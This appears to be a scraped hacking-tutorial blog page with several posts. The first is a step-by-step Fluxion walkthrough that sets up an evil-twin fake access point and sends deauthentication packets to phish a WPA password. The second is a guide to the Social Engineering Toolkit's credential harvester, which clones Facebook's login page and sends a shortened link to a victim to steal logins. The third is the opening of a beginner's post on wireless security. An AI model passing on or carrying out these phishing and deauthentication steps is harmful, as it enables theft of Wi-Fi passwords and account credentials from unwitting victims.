cd fluxion
Now, run the script.
sudo ./fluxion


If you have any unmet dependencies, then  run the installer script.
sudo ./
I had 4 unmet dependencies, and the installer script run was a buggy experience for me (though it might be becuase I have completely screwed up my system, editing files I wasn't supposed to and now I can't get them back in order) .It got stuck multiple times during the process, and I had to ctrl+c my way out of it many times (though ctrl+c didn't terminate the whole installer, just the little update popup). Also, I ran the installer script twice and that messed up with some of the apt-get settings. I suggest that after installation is complete, you restore your /etc/apt/sources.list to it's original state, and remove the bleeding edge repositories (unless you know what you're doing). To know what your repository should look like, take a look here.

Anyways, one way or the other, your unmet dependencies will be resolved, and then you can use Flexion.
PS: For those trying to use apt-get to install the missing stuff - some of the dependencies aren't available in the default Kali repos, so you'll have to let the script do the installation for you, or manually add the repos to /etc/apt/sources.list (look at the script to find out which repos you need to add)


Once again, type the following:
sudo ./fluxion

This time it should run just fine, and you would be asked a few very simple questions.
  • For the wireless adapter, choose whichever one you want to monitor on. For the channels question, choose all, unless you have a specific channel in mind, which you know has the target AP.
  • Then you will see an airodump-ng window (named Wifi Monitor). Let it run while it looks for APs and clients. Once you think you have what you need, use the close button to stop the monitoring.
  • Fluxion using airodump-ng
  • You'll then be prompted to select target.
  • Then you'll be prompted to select attack.
  • Then you'll be prompted to provide handshake.
  • If you don't have a handshake captured already, the script will help you capture one. It will send deauth packets to achieve that.
  • After that, I quit the procedure (I was using the script in my college hostel and didn't want to cause any troubles to other students).

If you are with me so far, then you can either just close this website, and try to use the tool on your own (it look intuitive enough to me), or you can read through the test run that I'm going to be doing now.

Getting my wireless network's password by fooling my smartphone into connecting to a fake AP

So, in this example run, I will try to find out the password of my wireless network by making my smartphone connect to a fake AP, and then type out the password in the smartphone, and then see if my Fluxion instance on my Kali machine (laptop) gets the password. Also, for the handshake, I will de-authenticate the same smartphone.

PS: You can probably follow this guide without having any clue how WPA works, what handshake is, what is actually going on, etc., but I suggest you do read up about these things. Here are a few links to other tutorials on this website itself that would prove useful (the first two are theoretical, yet nice, the third one is a pretty fun attack, which I suggest you try out, now or later):
  1. Things you should know about Wireless Hacking - Beginner Level Stuff
  2. Things you should know about Wireless Hacking Part II - Intermediate Level Stuff
  3. Evil Twin Attack
This is the theoretical stuff. Experience with tools like aircrack-ng, etc. would also be useful. Take a look at the navigation bar at the top and look at the various tutorials under the "Wireless Hacking" category.

Anyways, with the recommended reading material covered, you can comfortably move on to the actual hacking now:

The real stuff begins!

This section is going to be a set of pictures with captions below them explaining stuff. It should be easy to follow I hope.

Select language
After selecting language, this step shows up.
Note how I am not using any external wireless card, but my laptop's internal card.
However, some internal cards may cause problems, so it's better to use an
external card (and if you are on a virtual machine you will have to use an external card).

The scanning process starts, using airodump-ng.

You get to choose a target. I'm going after network number 21, the one my smartphone
is connected to.

You choose an attack. I am going to choose the Hostapd (first one) attack.

If you had already captured a 4-way handshake, then you can specify the location
to that handshake and the script will use it. Otherwise, it will capture a handshake
in the next step for you. (A tutorial on capturing the handshake separately)
If you didn't capture a handshake beforehand, then you get to choose which
tool to use to do that. I'm go with aircrack-ng.

Once you have a handshake captured (see the WPA Handshake: [MAC Address] on top, if it's
there, then you have the handhake), then type 1 and enter to check the handshake. If everything's fine,
you'll go to the next step.

Use the Web Interface method. I didn't try the bruteforce thing, but I guess it's just
the usual bruteforce attack that most tools use (and thus no use to us, since that's
not what we are using this script for).

This offers a variety of login pages that you can use to get (phish) the
WPA network's password. I went with the first choice.

After making your decision, you'll see multiple windows. DHCP and DNS requests are being handled in
left two windows, while the right two are status reporting window and deauth window (to get users
off the actual AP and lure them to our fake AP)

In my smartphone, I see two network of the same name. Note that while the original network is WPA-2
protected, the fake AP we have created is an open network (which is a huge giveaway stopping most people
from making the mistake of connecting to it). Anyways, I connected to the fake AP, and the DNS and DHCP windows
(left ones), reacted accordingly.
After connecting to the network, I got a notification saying that I need to login to the wireless network.
On clicking that, I found this page. For some people, you'll have to open your browser and try to open a website (say to get this page to show up. After I entered the password, and pressed submit, the script ran the
password against the handshake we had captured earlier to verify if it is indeed correct. Note how the
handshake is a luxury, not a necessity in this method. It just ensures that we can verify if the password
submitted by the fake AP client is correct or not. If we don't have the handshake, then we lose this ability,
but assuming the client will type the correct password, we can still make the attack work.

Aircrack-ng tried the password again the handshake, and as expected, it worked.
We successfully obtained the password to a WPA-2 protected network in a matter of minutes.

Video Demonstration

PS: The creator of the video has forked the Fluxion repository, and in the video he cloned from it instead. You may choose to fork from either of those. The original repository being more updated, and forked one being more stable (but less frequently updated). As of the time of creation of the video, both the repositories were the same, so it doesn't make a different which one you clone, but this may not always be the case. In case of any issues, you can probably try cloning both and see which one works for you.


Since fluxion and Kali both are constantly evolving (you might be using a different rolling release of Kali, as well as a different version of Fluxion. There are times when the tool break, and there's an interval of time for which it stays broken. Look at the issues page, and you will most probably find a fix for your problem. Note that the issue may as well be in closed issues (it would most probably be in closed issue).

For those who are able to follow the guide to the second last step, but don't get any Login page on their device, this issue suggests a solution. [Dated : 17th September, if you're reading this much later then this might not be relevant, and some other issue would be]

What now?

I illustrated one possible scenario. This script can work with other devices (laptops for example) too as the fooled clients (not just smartphones). One possible short-coming to this attack is that most smartphones/laptops these days don't automatically connect to open networks (unless they have before), and hence the user has to do it manually. If your fake AP has more signal strength than the real one, then a person who doesn't know about WPA and open networks could very easily end up connecting to your network instead. So, overall this attack has a fair chance of succeeding.

Have any problems/comments/suggestions, leave them in the comments below.

Saturday, August 13, 2016

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.


It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

LET'S DO THIS!!!!!!!!!

Follow this video..........


1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in (your ip address)
          set:webattack>Enter the url to clone:

6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

More Detailed Guides

If there's something that isn't clear then there's a 3 post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvestor attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extent attack outside your LAN

Monday, August 1, 2016

Things You Should Know : Wireless Hacking Basics

This is the first post in a new series of posts that don't involve any real hacking (and hence don't require that you have Kali installed on your system), but instead explain concepts in an interesting way (at least I hope so). If you have tried getting started into the world of hacking, but failed despite your best attempts, then this series will get you in a position where you'll find it easier to understand any tutorials you read in the future(on this site or any other). Note that I might use some technical jargon at some places, but would usually try to use laymen terms. Also, this guide is an oversimplification and hence factual precision is not it's strong suit, ease of understanding is.


You should know-
  • Nothing really.


You will know -
  • What are the different flavors of wireless networks you'll encounter and how difficult it is to hack each of them.
  • What are hidden networks, and whether they offer a real challenge to a hacker.
  • You'll have a very rough idea how each of the various 'flavors' of wireless networks is actually hacked.
(The last point would be covered in details in the next post)

Wireless Security Levels

Below is a (bad but hopefully helpful) analogue I'm using to explain various possible security implementations that a wireless network may have.
Suppose you are the owner of a club. There can be many possible scenarios as far as entry to the club is concerned :-

  • Open Entry

    Open networks- They don't require passwords to
    connect to the wireless router (access point).
    1. Open entry and unrestricted usage - Anyone can walk right in. They have unrestricted access to the dance floor, free beer, etc.
      This is open network. This is only used in public places (restaurants, etc.) which offer free Internet access to it's users (WiFi hotspots) . It's fairly uncommon to find such networks.
    2.  Open entry but restricted usage - Anyone can walk right in, but have to pay for drinks. For the router's security purposes, this is also an open network. However, connecting to the wireless router (entering the club) doesn't guarantee you unlimited access to the internet. There is another layer of authentication. These are seen in public places (airports, restaurants, fast food joints, shopping malls) where they let you connect to the wireless network without any password, but after that you have an additional layer between you and the internet. This layer usually restricts your ability to access the internet (either by bandwidth or by time). This layer can be used to charge you for the amount of data you use.
© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC